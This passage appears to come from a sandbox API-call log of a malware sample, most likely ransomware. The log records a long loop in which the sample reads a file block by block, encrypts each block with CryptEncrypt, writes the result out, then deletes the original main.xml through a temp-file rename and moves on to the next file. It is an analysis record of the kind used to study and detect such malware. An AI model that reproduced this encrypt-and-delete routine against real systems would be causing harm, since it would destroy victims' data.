pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.354] GetLastError () returned 0x0 [0155.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.354] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.354] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.354] GetLastError () returned 0x0 [0155.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.354] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.354] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.354] GetLastError () returned 0x0 [0155.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.354] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.354] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.354] GetLastError () returned 0x0 [0155.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.354] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.354] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.354] GetLastError () returned 0x0 [0155.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.354] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.354] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.354] GetLastError () returned 0x0 [0155.354] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.354] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.355] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.355] GetLastError () returned 0x0 [0155.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.355] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.355] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.355] GetLastError () returned 0x0 [0155.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.355] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.355] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.355] GetLastError () returned 0x0 [0155.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.355] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.355] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.355] GetLastError () returned 0x0 [0155.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.355] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.355] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.355] GetLastError () returned 0x0 [0155.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.355] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.355] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.355] GetLastError () returned 0x0 [0155.355] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.356] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.356] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.356] GetLastError () returned 0x0 [0155.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.356] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.356] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.356] GetLastError () returned 0x0 [0155.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.356] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.356] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.356] GetLastError () returned 0x0 [0155.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.356] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.356] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.356] GetLastError () returned 0x0 [0155.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.356] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.356] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.356] GetLastError () returned 0x0 [0155.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.356] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.356] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.356] GetLastError () returned 0x0 [0155.356] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.357] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.357] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.357] GetLastError () returned 0x0 [0155.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.357] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.357] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.357] GetLastError () returned 0x0 [0155.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.357] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.357] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.357] GetLastError () returned 0x0 [0155.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.357] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.357] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.357] GetLastError () returned 0x0 [0155.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.357] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.357] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.357] GetLastError () returned 0x0 [0155.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.357] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.357] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.357] GetLastError () returned 0x0 [0155.357] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.357] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.357] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.358] GetLastError () returned 0x0 [0155.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.358] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.358] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.358] GetLastError () returned 0x0 [0155.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.358] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.358] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.358] GetLastError () returned 0x0 [0155.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.358] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0xda, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0xda, lpOverlapped=0x0) returned 1 [0155.358] CryptEncrypt (in: hKey=0x9ad478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xda, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xe0) returned 1 [0155.358] GetLastError () returned 0x0 [0155.358] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xe0, lpOverlapped=0x0) returned 1 [0155.358] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4dd8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.358] WriteFile (in: hFile=0x588, lpBuffer=0x28d4dd8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x28d4dd8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml")) returned 0x20 [0155.359] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml", dwFileAttributes=0x20) returned 0 [0155.359] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned 1 [0155.359] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml")) returned 0 [0155.359] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" [0155.359] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.359] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD20A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd20a.tmp")) returned 0xd20a [0155.360] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD20A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd20a.tmp"), dwFlags=0x1) returned 0 [0155.360] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD20A.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd20a.tmp")) returned 1 [0155.361] CryptDestroyKey (hKey=0x9ad478) returned 1 [0155.361] wcslen (_String="OK") returned 0x2 [0155.361] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.361] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.361] CryptDestroyKey (hKey=0x9ad278) returned 1 [0155.361] CryptDestroyHash (hHash=0x9ad438) returned 1 [0155.361] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0155.361] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.361] wcscmp (_String1="oskclearui", _String2=".") returned 1 [0155.361] wcscmp (_String1="oskclearui", _String2="..") returned 1 [0155.361] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: 